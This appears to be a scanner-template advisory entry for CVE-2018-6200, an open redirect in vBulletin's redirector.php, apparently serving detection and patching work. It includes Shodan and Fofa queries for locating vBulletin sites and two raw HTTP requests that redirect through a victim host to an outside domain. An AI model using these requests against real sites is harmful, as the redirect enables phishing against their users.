| Title | vBulletin - Open Redirect |
|---|---|
| Author | 0x_Akoko,daffainfo |
| Severity | Medium |
| Impact | An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks. |
| Remediation | Apply the latest security patches and updates provided by vBulletin to fix the open redirect vulnerability. |
| CVSS Score | 6.1 |
| EPSS Score | 0.29986 |
| CVE ID | CVE-2018-6200 |
| CWE ID | CWE-601 |
| Shodan Query | http.title:"powered by vbulletin"http.html:"powered by vbulletin"http.component:"vbulletin"cpe:"cpe:2.3:a:vbulletin:vbulletin" |
| Fofa Query | body="powered by vbulletin"title="powered by vbulletin" |
| Tags | cve cve2018 redirect vbulletin vuln |
vBulletin 3.x.x and 4.2.x through 4.2.5 contains an open redirect vulnerability via the redirector.php URL parameter. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
GET /redirector.php?url=https://interact.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /redirector.php?do=nodelay&url=https://interact.sh HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-6200.yaml
🦈 Packet Capture: ⬇️ Download cve-2018-6200.pcap
N/AN/A